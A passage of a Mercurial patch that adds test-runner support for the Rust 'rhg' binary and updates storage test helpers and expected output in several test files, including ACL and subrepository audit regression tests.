--with-rhg instead)' + ) + if options.rhg and options.chg: + parser.error('--rhg and --chg do not work together') if options.color == 'always' and not pygmentspresent: sys.stderr.write( @@ -1338,6 +1372,7 @@ env['TESTNAME'] = self.name env['HOME'] = _bytes2sys(self._testtmp) if os.name == 'nt': + env['REALUSERPROFILE'] = env['USERPROFILE'] # py3.8+ ignores HOME: https://bugs.python.org/issue36264 env['USERPROFILE'] = env['HOME'] formated_timeout = _bytes2sys(b"%d" % default_defaults['timeout'][1]) @@ -2278,7 +2313,7 @@ if test.path.endswith(b'.t'): rename(test.errpath, test.path) else: - rename(test.errpath, '%s.out' % test.path) + rename(test.errpath, b'%s.out' % test.path) accepted = True if not accepted: self.faildata[test.name] = b''.join(lines) @@ -3098,6 +3133,25 @@ chgbindir = os.path.dirname(os.path.realpath(self.options.with_chg)) self._hgcommand = os.path.basename(self.options.with_chg) + # configure fallback and replace "hg" command by "rhg" + rhgbindir = self._bindir + if self.options.rhg or self.options.with_rhg: + # Affects hghave.py + osenvironb[b'RHG_INSTALLED_AS_HG'] = b'1' + # Affects configuration. Alternatives would be setting configuration through + # `$HGRCPATH` but some tests override that, or changing `_hgcommand` to include + # `--config` but that disrupts tests that print command lines and check expected + # output. + osenvironb[b'RHG_ON_UNSUPPORTED'] = b'fallback' + osenvironb[b'RHG_FALLBACK_EXECUTABLE'] = os.path.join( + self._bindir, self._hgcommand + ) + if self.options.rhg: + self._hgcommand = b'rhg' + elif self.options.with_rhg: + rhgbindir = os.path.dirname(os.path.realpath(self.options.with_rhg)) + self._hgcommand = os.path.basename(self.options.with_rhg) + osenvironb[b"BINDIR"] = self._bindir osenvironb[b"PYTHON"] = PYTHON @@ -3116,6 +3170,8 @@ path.insert(2, realdir) if chgbindir != self._bindir: path.insert(1, chgbindir) + if rhgbindir != self._bindir: + path.insert(1, rhgbindir) if self._testdir != runtestdir: path = [self._testdir] + path if self._tmpbindir != self._bindir: @@ -3335,6 +3391,9 @@ if self.options.chg: assert self._installdir self._installchg() + if self.options.rhg: + assert self._installdir + self._installrhg() log( 'running %d tests using %d parallel processes' @@ -3696,6 +3755,33 @@ sys.stdout.write(out) sys.exit(1) + def _installrhg(self): + """Install rhg into the test environment""" + vlog('# Performing temporary installation of rhg') + assert os.path.dirname(self._bindir) == self._installdir + assert self._hgroot, 'must be called after _installhg()' + cmd = b'"%(make)s" install-rhg PREFIX="%(prefix)s"' % { + b'make': b'make', # TODO: switch by option or environment? + b'prefix': self._installdir, + } + cwd = self._hgroot + vlog("# Running", cmd) + proc = subprocess.Popen( + cmd, + shell=True, + cwd=cwd, + stdin=subprocess.PIPE, + stdout=subprocess.PIPE, + stderr=subprocess.STDOUT, + ) + out, _err = proc.communicate() + if proc.returncode != 0: + if PYTHON3: + sys.stdout.buffer.write(out) + else: + sys.stdout.write(out) + sys.exit(1) + def _outputcoverage(self): """Produce code coverage output.""" import coverage diff --git a/tests/simplestorerepo.py b/tests/simplestorerepo.py --- a/tests/simplestorerepo.py +++ b/tests/simplestorerepo.py @@ -106,7 +106,9 @@ _flagserrorclass = simplestoreerror - def __init__(self, svfs, path): + def __init__(self, repo, svfs, path): + self.nullid = repo.nullid + self._repo = repo self._svfs = svfs self._path = path @@ -300,7 +302,7 @@ text = rawtext else: r = flagutil.processflagsread(self, rawtext, flags) - text, validatehash, sidedata = r + text, validatehash = r if validatehash: self.checkhash(text, node, rev=rev) @@ -446,6 +448,7 @@ revisiondata=False, assumehaveparentrevisions=False, deltamode=repository.CG_DELTAMODE_STD, + sidedata_helpers=None, ): # TODO this will probably break on some ordering options. nodes = [n for n in nodes if n != nullid] @@ -459,6 +462,7 @@ revisiondata=revisiondata, assumehaveparentrevisions=assumehaveparentrevisions, deltamode=deltamode, + sidedata_helpers=sidedata_helpers, ): yield delta @@ -550,7 +554,7 @@ if node in self._indexbynode: if duplicaterevisioncb: - duplicaterevisioncb(self, node) + duplicaterevisioncb(self, self.rev(node)) empty = False continue @@ -560,12 +564,12 @@ else: text = mdiff.patch(self.revision(deltabase), delta) - self._addrawrevision( + rev = self._addrawrevision( node, text, transaction, linkrev, p1, p2, flags ) if addrevisioncb: - addrevisioncb(self, node) + addrevisioncb(self, rev) empty = False return not empty @@ -687,7 +691,7 @@ class simplestorerepo(repo.__class__): def file(self, f): - return filestorage(self.svfs, f) + return filestorage(repo, self.svfs, f) repo.__class__ = simplestorerepo diff --git a/tests/svnxml.py b/tests/svnxml.py --- a/tests/svnxml.py +++ b/tests/svnxml.py @@ -15,6 +15,7 @@ e['revision'] = entry.getAttribute('revision') e['author'] = xmltext(entry.getElementsByTagName('author')[0]) e['msg'] = xmltext(entry.getElementsByTagName('msg')[0]) + e['date'] = xmltext(entry.getElementsByTagName('date')[0]) e['paths'] = [] paths = entry.getElementsByTagName('paths') if paths: @@ -42,7 +43,7 @@ except AttributeError: fp = sys.stdout for e in entries: - for k in ('revision', 'author', 'msg'): + for k in ('revision', 'author', 'date', 'msg'): fp.write(('%s: %s\n' % (k, e[k])).encode('utf-8')) for path, action, fpath, frev in sorted(e['paths']): frominfo = b'' diff --git a/tests/test-acl.t b/tests/test-acl.t --- a/tests/test-acl.t +++ b/tests/test-acl.t @@ -109,14 +109,14 @@ f9cafe1212c8c6fa1120d14a556e18cc44ff8bdd 911600dab2ae7a9baff75958b84fe606851ce955 bundle2-output-bundle: "HG20", 5 parts total - bundle2-output-part: "replycaps" 224 bytes payload + bundle2-output-part: "replycaps" 207 bytes payload bundle2-output-part: "check:phases" 24 bytes payload bundle2-output-part: "check:updated-heads" streamed payload bundle2-output-part: "changegroup" (params: 1 mandatory) streamed payload bundle2-output-part: "phase-heads" 24 bytes payload bundle2-input-bundle: with-transaction bundle2-input-part: "replycaps" supported - bundle2-input-part: total payload size 224 + bundle2-input-part: total payload size 207 bundle2-input-part: "check:phases" supported bundle2-input-part: total payload size 24 bundle2-input-part: "check:updated-heads" supported @@ -175,14 +175,14 @@ f9cafe1212c8c6fa1120d14a556e18cc44ff8bdd 911600dab2ae7a9baff75958b84fe606851ce955 bundle2-output-bundle: "HG20", 5 parts total - bundle2-output-part: "replycaps" 224 bytes payload + bundle2-output-part: "replycaps" 207 bytes payload bundle2-output-part: "check:phases" 24 bytes payload bundle2-output-part: "check:updated-heads" streamed payload bundle2-output-part: "changegroup" (params: 1 mandatory) streamed payload bundle2-output-part: "phase-heads" 24 bytes payload bundle2-input-bundle: with-transaction bundle2-input-part: "replycaps" supported - bundle2-input-part: total payload size 224 + bundle2-input-part: total payload size 207 bundle2-input-part: "check:phases" supported bundle2-input-part: total payload size 24 bundle2-input-part: "check:updated-heads" supported @@ -204,6 +204,7 @@ bundle2-input-part: "phase-heads" supported bundle2-input-part: total payload size 24 bundle2-input-bundle: 5 parts total + truncating cache/rbc-revs-v1 to 8 updating the branch cache added 3 changesets with 3 changes to 3 files bundle2-output-bundle: "HG20", 1 parts total @@ -244,14 +245,14 @@ f9cafe1212c8c6fa1120d14a556e18cc44ff8bdd 911600dab2ae7a9baff75958b84fe606851ce955 bundle2-output-bundle: "HG20", 5 parts total - bundle2-output-part: "replycaps" 224 bytes payload + bundle2-output-part: "replycaps" 207 bytes payload bundle2-output-part: "check:phases" 24 bytes payload bundle2-output-part: "check:updated-heads" streamed payload bundle2-output-part: "changegroup" (params: 1 mandatory) streamed payload bundle2-output-part: "phase-heads" 24 bytes payload bundle2-input-bundle: with-transaction bundle2-input-part: "replycaps" supported - bundle2-input-part: total payload size 224 + bundle2-input-part: total payload size 207 bundle2-input-part: "check:phases" supported bundle2-input-part: total payload size 24 bundle2-input-part: "check:updated-heads" supported @@ -283,6 +284,7 @@ bundle2-input-part: "phase-heads" supported bundle2-input-part: total payload size 24 bundle2-input-bundle: 5 parts total + truncating cache/rbc-revs-v1 to 8 updating the branch cache added 3 changesets with 3 changes to 3 files bundle2-output-bundle: "HG20", 1 parts total @@ -323,14 +325,14 @@ f9cafe1212c8c6fa1120d14a556e18cc44ff8bdd 911600dab2ae7a9baff75958b84fe606851ce955 bundle2-output-bundle: "HG20", 5 parts total - bundle2-output-part: "replycaps" 224 bytes payload + bundle2-output-part: "replycaps" 207 bytes payload bundle2-output-part: "check:phases" 24 bytes payload bundle2-output-part: "check:updated-heads" streamed payload bundle2-output-part: "changegroup" (params: 1 mandatory) streamed payload bundle2-output-part: "phase-heads" 24 bytes payload bundle2-input-bundle: with-transaction bundle2-input-part: "replycaps" supported - bundle2-input-part: total payload size 224 + bundle2-input-part: total payload size 207 bundle2-input-part: "check:phases" supported bundle2-input-part: total payload size 24 bundle2-input-part: "check:updated-heads" supported @@ -359,6 +361,7 @@ bundle2-input-bundle: 5 parts total transaction abort! rollback completed + truncating cache/rbc-revs-v1 to 8 abort: acl: user "fred" not allowed on "foo/file.txt" (changeset "ef1ea85a6374") no rollback information available 0:6675d58eff77 @@ -393,14 +396,14 @@ f9cafe1212c8c6fa1120d14a556e18cc44ff8bdd 911600dab2ae7a9baff75958b84fe606851ce955 bundle2-output-bundle: "HG20", 5 parts total - bundle2-output-part: "replycaps" 224 bytes payload + bundle2-output-part: "replycaps" 207 bytes payload bundle2-output-part: "check:phases" 24 bytes payload bundle2-output-part: "check:updated-heads" streamed payload bundle2-output-part: "changegroup" (params: 1 mandatory) streamed payload bundle2-output-part: "phase-heads" 24 bytes payload bundle2-input-bundle: with-transaction bundle2-input-part: "replycaps" supported - bundle2-input-part: total payload size 224 + bundle2-input-part: total payload size 207 bundle2-input-part: "check:phases" supported bundle2-input-part: total payload size 24 bundle2-input-part: "check:updated-heads" supported @@ -468,14 +471,14 @@ f9cafe1212c8c6fa1120d14a556e18cc44ff8bdd 911600dab2ae7a9baff75958b84fe606851ce955 bundle2-output-bundle: "HG20", 5 parts total - bundle2-output-part: "replycaps" 224 bytes payload + bundle2-output-part: "replycaps" 207 bytes payload bundle2-output-part: "check:phases" 24 bytes payload bundle2-output-part: "check:updated-heads" streamed payload bundle2-output-part: "changegroup" (params: 1 mandatory) streamed payload bundle2-output-part: "phase-heads" 24 bytes payload bundle2-input-bundle: with-transaction bundle2-input-part: "replycaps" supported - bundle2-input-part: total payload size 224 + bundle2-input-part: total payload size 207 bundle2-input-part: "check:phases" supported bundle2-input-part: total payload size 24 bundle2-input-part: "check:updated-heads" supported @@ -540,14 +543,14 @@ f9cafe1212c8c6fa1120d14a556e18cc44ff8bdd 911600dab2ae7a9baff75958b84fe606851ce955 bundle2-output-bundle: "HG20", 5 parts total - bundle2-output-part: "replycaps" 224 bytes payload + bundle2-output-part: "replycaps" 207 bytes payload bundle2-output-part: "check:phases" 24 bytes payload bundle2-output-part: "check:updated-heads" streamed payload bundle2-output-part: "changegroup" (params: 1 mandatory) streamed payload bundle2-output-part: "phase-heads" 24 bytes payload bundle2-input-bundle: with-transaction bundle2-input-part: "replycaps" supported - bundle2-input-part: total payload size 224 + bundle2-input-part: total payload size 207 bundle2-input-part: "check:phases" supported bundle2-input-part: total payload size 24 bundle2-input-part: "check:updated-heads" supported @@ -617,14 +620,14 @@ f9cafe1212c8c6fa1120d14a556e18cc44ff8bdd 911600dab2ae7a9baff75958b84fe606851ce955 bundle2-output-bundle: "HG20", 5 parts total - bundle2-output-part: "replycaps" 224 bytes payload + bundle2-output-part: "replycaps" 207 bytes payload bundle2-output-part: "check:phases" 24 bytes payload bundle2-output-part: "check:updated-heads" streamed payload bundle2-output-part: "changegroup" (params: 1 mandatory) streamed payload bundle2-output-part: "phase-heads" 24 bytes payload bundle2-input-bundle: with-transaction bundle2-input-part: "replycaps" supported - bundle2-input-part: total payload size 224 + bundle2-input-part: total payload size 207 bundle2-input-part: "check:phases" supported bundle2-input-part: total payload size 24 bundle2-input-part: "check:updated-heads" supported @@ -691,14 +694,14 @@ f9cafe1212c8c6fa1120d14a556e18cc44ff8bdd 911600dab2ae7a9baff75958b84fe606851ce955 bundle2-output-bundle: "HG20", 5 parts total - bundle2-output-part: "replycaps" 224 bytes payload + bundle2-output-part: "replycaps" 207 bytes payload bundle2-output-part: "check:phases" 24 bytes payload bundle2-output-part: "check:updated-heads" streamed payload bundle2-output-part: "changegroup" (params: 1 mandatory) streamed payload bundle2-output-part: "phase-heads" 24 bytes payload bundle2-input-bundle: with-transaction bundle2-input-part: "replycaps" supported - bundle2-input-part: total payload size 224 + bundle2-input-part: total payload size 207 bundle2-input-part: "check:phases" supported bundle2-input-part: total payload size 24 bundle2-input-part: "check:updated-heads" supported @@ -764,7 +767,7 @@ list of changesets: ef1ea85a6374b77d6da9dcda9541f498f2d17df7 bundle2-output-bundle: "HG20", 7 parts total - bundle2-output-part: "replycaps" 224 bytes payload + bundle2-output-part: "replycaps" 207 bytes payload bundle2-output-part: "check:bookmarks" 37 bytes payload bundle2-output-part: "check:phases" 24 bytes payload bundle2-output-part: "check:updated-heads" streamed payload @@ -773,7 +776,7 @@ bundle2-output-part: "bookmarks" 37 bytes payload bundle2-input-bundle: with-transaction bundle2-input-part: "replycaps" supported - bundle2-input-part: total payload size 224 + bundle2-input-part: total payload size 207 bundle2-input-part: "check:bookmarks" supported bundle2-input-part: total payload size 37 bundle2-input-part: "check:phases" supported @@ -853,7 +856,7 @@ list of changesets: ef1ea85a6374b77d6da9dcda9541f498f2d17df7 bundle2-output-bundle: "HG20", 7 parts total - bundle2-output-part: "replycaps" 224 bytes payload + bundle2-output-part: "replycaps" 207 bytes payload bundle2-output-part: "check:bookmarks" 37 bytes payload bundle2-output-part: "check:phases" 24 bytes payload bundle2-output-part: "check:updated-heads" streamed payload @@ -862,7 +865,7 @@ bundle2-output-part: "bookmarks" 37 bytes payload bundle2-input-bundle: with-transaction bundle2-input-part: "replycaps" supported - bundle2-input-part: total payload size 224 + bundle2-input-part: total payload size 207 bundle2-input-part: "check:bookmarks" supported bundle2-input-part: total payload size 37 bundle2-input-part: "check:phases" supported @@ -897,6 +900,7 @@ bundle2-input-bundle: 7 parts total transaction abort! rollback completed + truncating cache/rbc-revs-v1 to 8 abort: acl: user "fred" denied on bookmark "moving-bookmark" (changeset "ef1ea85a6374b77d6da9dcda9541f498f2d17df7") no rollback information available 0:6675d58eff77 @@ -943,14 +947,14 @@ f9cafe1212c8c6fa1120d14a556e18cc44ff8bdd 911600dab2ae7a9baff75958b84fe606851ce955 bundle2-output-bundle: "HG20", 5 parts total - bundle2-output-part: "replycaps" 224 bytes payload + bundle2-output-part: "replycaps" 207 bytes payload bundle2-output-part: "check:phases" 24 bytes payload bundle2-output-part: "check:updated-heads" streamed payload bundle2-output-part: "changegroup" (params: 1 mandatory) streamed payload bundle2-output-part: "phase-heads" 24 bytes payload bundle2-input-bundle: with-transaction bundle2-input-part: "replycaps" supported - bundle2-input-part: total payload size 224 + bundle2-input-part: total payload size 207 bundle2-input-part: "check:phases" supported bundle2-input-part: total payload size 24 bundle2-input-part: "check:updated-heads" supported @@ -1029,14 +1033,14 @@ f9cafe1212c8c6fa1120d14a556e18cc44ff8bdd 911600dab2ae7a9baff75958b84fe606851ce955 bundle2-output-bundle: "HG20", 5 parts total - bundle2-output-part: "replycaps" 224 bytes payload + bundle2-output-part: "replycaps" 207 bytes payload bundle2-output-part: "check:phases" 24 bytes payload bundle2-output-part: "check:updated-heads" streamed payload bundle2-output-part: "changegroup" (params: 1 mandatory) streamed payload bundle2-output-part: "phase-heads" 24 bytes payload bundle2-input-bundle: with-transaction bundle2-input-part: "replycaps" supported - bundle2-input-part: total payload size 224 + bundle2-input-part: total payload size 207 bundle2-input-part: "check:phases" supported bundle2-input-part: total payload size 24 bundle2-input-part: "check:updated-heads" supported @@ -1069,6 +1073,7 @@ bundle2-input-bundle: 5 parts total transaction abort! rollback completed + truncating cache/rbc-revs-v1 to 8 abort: acl: user "wilma" not allowed on "quux/file.py" (changeset "911600dab2ae") no rollback information available 0:6675d58eff77 @@ -1112,14 +1117,14 @@ f9cafe1212c8c6fa1120d14a556e18cc44ff8bdd 911600dab2ae7a9baff75958b84fe606851ce955 bundle2-output-bundle: "HG20", 5 parts total - bundle2-output-part: "replycaps" 224 bytes payload + bundle2-output-part: "replycaps" 207 bytes payload bundle2-output-part: "check:phases" 24 bytes payload bundle2-output-part: "check:updated-heads" streamed payload bundle2-output-part: "changegroup" (params: 1 mandatory) streamed payload bundle2-output-part: "phase-heads" 24 bytes payload bundle2-input-bundle: with-transaction bundle2-input-part: "replycaps" supported - bundle2-input-part: total payload size 224 + bundle2-input-part: total payload size 207 bundle2-input-part: "check:phases" supported bundle2-input-part: total payload size 24 bundle2-input-part: "check:updated-heads" supported @@ -1190,14 +1195,14 @@ f9cafe1212c8c6fa1120d14a556e18cc44ff8bdd 911600dab2ae7a9baff75958b84fe606851ce955 bundle2-output-bundle: "HG20", 5 parts total - bundle2-output-part: "replycaps" 224 bytes payload + bundle2-output-part: "replycaps" 207 bytes payload bundle2-output-part: "check:phases" 24 bytes payload bundle2-output-part: "check:updated-heads" streamed payload bundle2-output-part: "changegroup" (params: 1 mandatory) streamed payload bundle2-output-part: "phase-heads" 24 bytes payload bundle2-input-bundle: with-transaction bundle2-input-part: "replycaps" supported - bundle2-input-part: total payload size 224 + bundle2-input-part: total payload size 207 bundle2-input-part: "check:phases" supported bundle2-input-part: total payload size 24 bundle2-input-part: "check:updated-heads" supported @@ -1279,14 +1284,14 @@ f9cafe1212c8c6fa1120d14a556e18cc44ff8bdd 911600dab2ae7a9baff75958b84fe606851ce955 bundle2-output-bundle: "HG20", 5 parts total - bundle2-output-part: "replycaps" 224 bytes payload + bundle2-output-part: "replycaps" 207 bytes payload bundle2-output-part: "check:phases" 24 bytes payload bundle2-output-part: "check:updated-heads" streamed payload bundle2-output-part: "changegroup" (params: 1 mandatory) streamed payload bundle2-output-part: "phase-heads" 24 bytes payload bundle2-input-bundle: with-transaction bundle2-input-part: "replycaps" supported - bundle2-input-part: total payload size 224 + bundle2-input-part: total payload size 207 bundle2-input-part: "check:phases" supported bundle2-input-part: total payload size 24 bundle2-input-part: "check:updated-heads" supported @@ -1369,14 +1374,14 @@ f9cafe1212c8c6fa1120d14a556e18cc44ff8bdd 911600dab2ae7a9baff75958b84fe606851ce955 bundle2-output-bundle: "HG20", 5 parts total - bundle2-output-part: "replycaps" 224 bytes payload + bundle2-output-part: "replycaps" 207 bytes payload bundle2-output-part: "check:phases" 24 bytes payload bundle2-output-part: "check:updated-heads" streamed payload bundle2-output-part: "changegroup" (params: 1 mandatory) streamed payload bundle2-output-part: "phase-heads" 24 bytes payload bundle2-input-bundle: with-transaction bundle2-input-part: "replycaps" supported - bundle2-input-part: total payload size 224 + bundle2-input-part: total payload size 207 bundle2-input-part: "check:phases" supported bundle2-input-part: total payload size 24 bundle2-input-part: "check:updated-heads" supported @@ -1408,6 +1413,7 @@ bundle2-input-part: "phase-heads" supported bundle2-input-part: total payload size 24 bundle2-input-bundle: 5 parts total + truncating cache/rbc-revs-v1 to 8 updating the branch cache added 3 changesets with 3 changes to 3 files bundle2-output-bundle: "HG20", 1 parts total @@ -1455,14 +1461,14 @@ f9cafe1212c8c6fa1120d14a556e18cc44ff8bdd 911600dab2ae7a9baff75958b84fe606851ce955 bundle2-output-bundle: "HG20", 5 parts total - bundle2-output-part: "replycaps" 224 bytes payload + bundle2-output-part: "replycaps" 207 bytes payload bundle2-output-part: "check:phases" 24 bytes payload bundle2-output-part: "check:updated-heads" streamed payload bundle2-output-part: "changegroup" (params: 1 mandatory) streamed payload bundle2-output-part: "phase-heads" 24 bytes payload bundle2-input-bundle: with-transaction bundle2-input-part: "replycaps" supported - bundle2-input-part: total payload size 224 + bundle2-input-part: total payload size 207 bundle2-input-part: "check:phases" supported bundle2-input-part: total payload size 24 bundle2-input-part: "check:updated-heads" supported @@ -1493,6 +1499,7 @@ bundle2-input-bundle: 5 parts total transaction abort! rollback completed + truncating cache/rbc-revs-v1 to 8 abort: acl: user "fred" denied on "foo/Bar/file.txt" (changeset "f9cafe1212c8") no rollback information available 0:6675d58eff77 @@ -1537,14 +1544,14 @@ f9cafe1212c8c6fa1120d14a556e18cc44ff8bdd 911600dab2ae7a9baff75958b84fe606851ce955 bundle2-output-bundle: "HG20", 5 parts total - bundle2-output-part: "replycaps" 224 bytes payload + bundle2-output-part: "replycaps" 207 bytes payload bundle2-output-part: "check:phases" 24 bytes payload bundle2-output-part: "check:updated-heads" streamed payload bundle2-output-part: "changegroup" (params: 1 mandatory) streamed payload bundle2-output-part: "phase-heads" 24 bytes payload bundle2-input-bundle: with-transaction bundle2-input-part: "replycaps" supported - bundle2-input-part: total payload size 224 + bundle2-input-part: total payload size 207 bundle2-input-part: "check:phases" supported bundle2-input-part: total payload size 24 bundle2-input-part: "check:updated-heads" supported @@ -1624,14 +1631,14 @@ f9cafe1212c8c6fa1120d14a556e18cc44ff8bdd 911600dab2ae7a9baff75958b84fe606851ce955 bundle2-output-bundle: "HG20", 5 parts total - bundle2-output-part: "replycaps" 224 bytes payload + bundle2-output-part: "replycaps" 207 bytes payload bundle2-output-part: "check:phases" 24 bytes payload bundle2-output-part: "check:updated-heads" streamed payload bundle2-output-part: "changegroup" (params: 1 mandatory) streamed payload bundle2-output-part: "phase-heads" 24 bytes payload bundle2-input-bundle: with-transaction bundle2-input-part: "replycaps" supported - bundle2-input-part: total payload size 224 + bundle2-input-part: total payload size 207 bundle2-input-part: "check:phases" supported bundle2-input-part: total payload size 24 bundle2-input-part: "check:updated-heads" supported @@ -1664,6 +1671,7 @@ bundle2-input-bundle: 5 parts total transaction abort! rollback completed + truncating cache/rbc-revs-v1 to 8 abort: acl: user "fred" denied on "foo/Bar/file.txt" (changeset "f9cafe1212c8") no rollback information available 0:6675d58eff77 @@ -1746,14 +1754,14 @@ 911600dab2ae7a9baff75958b84fe606851ce955 e8fc755d4d8217ee5b0c2bb41558c40d43b92c01 bundle2-output-bundle: "HG20", 5 parts total - bundle2-output-part: "replycaps" 224 bytes payload + bundle2-output-part: "replycaps" 207 bytes payload bundle2-output-part: "check:phases" 48 bytes payload bundle2-output-part: "check:updated-heads" streamed payload bundle2-output-part: "changegroup" (params: 1 mandatory) streamed payload bundle2-output-part: "phase-heads" 48 bytes payload bundle2-input-bundle: with-transaction bundle2-input-part: "replycaps" supported - bundle2-input-part: total payload size 224 + bundle2-input-part: total payload size 207 bundle2-input-part: "check:phases" supported bundle2-input-part: total payload size 48 bundle2-input-part: "check:updated-heads" supported @@ -1833,14 +1841,14 @@ 911600dab2ae7a9baff75958b84fe606851ce955 e8fc755d4d8217ee5b0c2bb41558c40d43b92c01 bundle2-output-bundle: "HG20", 5 parts total - bundle2-output-part: "replycaps" 224 bytes payload + bundle2-output-part: "replycaps" 207 bytes payload bundle2-output-part: "check:phases" 48 bytes payload bundle2-output-part: "check:updated-heads" streamed payload bundle2-output-part: "changegroup" (params: 1 mandatory) streamed payload bundle2-output-part: "phase-heads" 48 bytes payload bundle2-input-bundle: with-transaction bundle2-input-part: "replycaps" supported - bundle2-input-part: total payload size 224 + bundle2-input-part: total payload size 207 bundle2-input-part: "check:phases" supported bundle2-input-part: total payload size 48 bundle2-input-part: "check:updated-heads" supported @@ -1911,14 +1919,14 @@ 911600dab2ae7a9baff75958b84fe606851ce955 e8fc755d4d8217ee5b0c2bb41558c40d43b92c01 bundle2-output-bundle: "HG20", 5 parts total - bundle2-output-part: "replycaps" 224 bytes payload + bundle2-output-part: "replycaps" 207 bytes payload bundle2-output-part: "check:phases" 48 bytes payload bundle2-output-part: "check:updated-heads" streamed payload bundle2-output-part: "changegroup" (params: 1 mandatory) streamed payload bundle2-output-part: "phase-heads" 48 bytes payload bundle2-input-bundle: with-transaction bundle2-input-part: "replycaps" supported - bundle2-input-part: total payload size 224 + bundle2-input-part: total payload size 207 bundle2-input-part: "check:phases" supported bundle2-input-part: total payload size 48 bundle2-input-part: "check:updated-heads" supported @@ -1985,14 +1993,14 @@ 911600dab2ae7a9baff75958b84fe606851ce955 e8fc755d4d8217ee5b0c2bb41558c40d43b92c01 bundle2-output-bundle: "HG20", 5 parts total - bundle2-output-part: "replycaps" 224 bytes payload + bundle2-output-part: "replycaps" 207 bytes payload bundle2-output-part: "check:phases" 48 bytes payload bundle2-output-part: "check:updated-heads" streamed payload bundle2-output-part: "changegroup" (params: 1 mandatory) streamed payload bundle2-output-part: "phase-heads" 48 bytes payload bundle2-input-bundle: with-transaction bundle2-input-part: "replycaps" supported - bundle2-input-part: total payload size 224 + bundle2-input-part: total payload size 207 bundle2-input-part: "check:phases" supported bundle2-input-part: total payload size 48 bundle2-input-part: "check:updated-heads" supported @@ -2053,14 +2061,14 @@ 911600dab2ae7a9baff75958b84fe606851ce955 e8fc755d4d8217ee5b0c2bb41558c40d43b92c01 bundle2-output-bundle: "HG20", 5 parts total - bundle2-output-part: "replycaps" 224 bytes payload + bundle2-output-part: "replycaps" 207 bytes payload bundle2-output-part: "check:phases" 48 bytes payload bundle2-output-part: "check:updated-heads" streamed payload bundle2-output-part: "changegroup" (params: 1 mandatory) streamed payload bundle2-output-part: "phase-heads" 48 bytes payload bundle2-input-bundle: with-transaction bundle2-input-part: "replycaps" supported - bundle2-input-part: total payload size 224 + bundle2-input-part: total payload size 207 bundle2-input-part: "check:phases" supported bundle2-input-part: total payload size 48 bundle2-input-part: "check:updated-heads" supported @@ -2145,14 +2153,14 @@ 911600dab2ae7a9baff75958b84fe606851ce955 e8fc755d4d8217ee5b0c2bb41558c40d43b92c01 bundle2-output-bundle: "HG20", 5 parts total - bundle2-output-part: "replycaps" 224 bytes payload + bundle2-output-part: "replycaps" 207 bytes payload bundle2-output-part: "check:phases" 48 bytes payload bundle2-output-part: "check:updated-heads" streamed payload bundle2-output-part: "changegroup" (params: 1 mandatory) streamed payload bundle2-output-part: "phase-heads" 48 bytes payload bundle2-input-bundle: with-transaction bundle2-input-part: "replycaps" supported - bundle2-input-part: total payload size 224 + bundle2-input-part: total payload size 207 bundle2-input-part: "check:phases" supported bundle2-input-part: total payload size 48 bundle2-input-part: "check:updated-heads" supported @@ -2236,14 +2244,14 @@ 911600dab2ae7a9baff75958b84fe606851ce955 e8fc755d4d8217ee5b0c2bb41558c40d43b92c01 bundle2-output-bundle: "HG20", 5 parts total - bundle2-output-part: "replycaps" 224 bytes payload + bundle2-output-part: "replycaps" 207 bytes payload bundle2-output-part: "check:phases" 48 bytes payload bundle2-output-part: "check:updated-heads" streamed payload bundle2-output-part: "changegroup" (params: 1 mandatory) streamed payload bundle2-output-part: "phase-heads" 48 bytes payload bundle2-input-bundle: with-transaction bundle2-input-part: "replycaps" supported - bundle2-input-part: total payload size 224 + bundle2-input-part: total payload size 207 bundle2-input-part: "check:phases" supported bundle2-input-part: total payload size 48 bundle2-input-part: "check:updated-heads" supported @@ -2309,14 +2317,14 @@ 911600dab2ae7a9baff75958b84fe606851ce955 e8fc755d4d8217ee5b0c2bb41558c40d43b92c01 bundle2-output-bundle: "HG20", 5 parts total - bundle2-output-part: "replycaps" 224 bytes payload + bundle2-output-part: "replycaps" 207 bytes payload bundle2-output-part: "check:phases" 48 bytes payload bundle2-output-part: "check:updated-heads" streamed payload bundle2-output-part: "changegroup" (params: 1 mandatory) streamed payload bundle2-output-part: "phase-heads" 48 bytes payload bundle2-input-bundle: with-transaction bundle2-input-part: "replycaps" supported - bundle2-input-part: total payload size 224 + bundle2-input-part: total payload size 207 bundle2-input-part: "check:phases" supported bundle2-input-part: total payload size 48 bundle2-input-part: "check:updated-heads" supported @@ -2394,14 +2402,14 @@ 911600dab2ae7a9baff75958b84fe606851ce955 e8fc755d4d8217ee5b0c2bb41558c40d43b92c01 bundle2-output-bundle: "HG20", 5 parts total - bundle2-output-part: "replycaps" 224 bytes payload + bundle2-output-part: "replycaps" 207 bytes payload bundle2-output-part: "check:phases" 48 bytes payload bundle2-output-part: "check:updated-heads" streamed payload bundle2-output-part: "changegroup" (params: 1 mandatory) streamed payload bundle2-output-part: "phase-heads" 48 bytes payload bundle2-input-bundle: with-transaction bundle2-input-part: "replycaps" supported - bundle2-input-part: total payload size 224 + bundle2-input-part: total payload size 207 bundle2-input-part: "check:phases" supported bundle2-input-part: total payload size 48 bundle2-input-part: "check:updated-heads" supported diff --git a/tests/test-archive.t b/tests/test-archive.t --- a/tests/test-archive.t +++ b/tests/test-archive.t @@ -334,10 +334,10 @@ > pass > if len(sys.argv) <= 3: > node, archive = sys.argv[1:] - > requeststr = 'cmd=archive;node=%s;type=%s' % (node, archive) + > requeststr = 'cmd=archive&node=%s&type=%s' % (node, archive) > else: > node, archive, file = sys.argv[1:] - > requeststr = 'cmd=archive;node=%s;type=%s;file=%s' % (node, archive, file) + > requeststr = 'cmd=archive&node=%s&type=%s&file=%s' % (node, archive, file) > try: > stdout = sys.stdout.buffer > except AttributeError: diff --git a/tests/test-audit-subrepo.t b/tests/test-audit-subrepo.t --- a/tests/test-audit-subrepo.t +++ b/tests/test-audit-subrepo.t @@ -323,7 +323,7 @@ new changesets 7a2f0e59146f .hgsubstate: untracked file differs abort: untracked files in working directory differ from files in requested revision - [255] + [20] $ cat main5/.hg/hgrc | grep pwned [1] @@ -623,7 +623,7 @@ new changesets * (glob) .hgsubstate: untracked file differs abort: untracked files in working directory differ from files in requested revision - [255] + [20] $ ls "$FAKEHOME" a $ test -d "$FAKEHOME/.hg" @@ -652,7 +652,7 @@ new changesets * (glob) .hgsubstate: untracked file differs abort: untracked files in working directory differ from files in requested revision - [255] + [20] $ ls -A "$FAKEHOME" .hg a diff --git a/tests/test-backout.t b/tests/test-backout.t --- a/tests/test-backout.t +++ b/tests/test-backout.t @@ -718,6 +718,7 @@ ancestor path: foo (node f89532f44c247a0e993d63e3a734dd781ab04708) other path: foo (node f50039b486d6fa1a90ae51778388cad161f425ee) extra: ancestorlinknode = 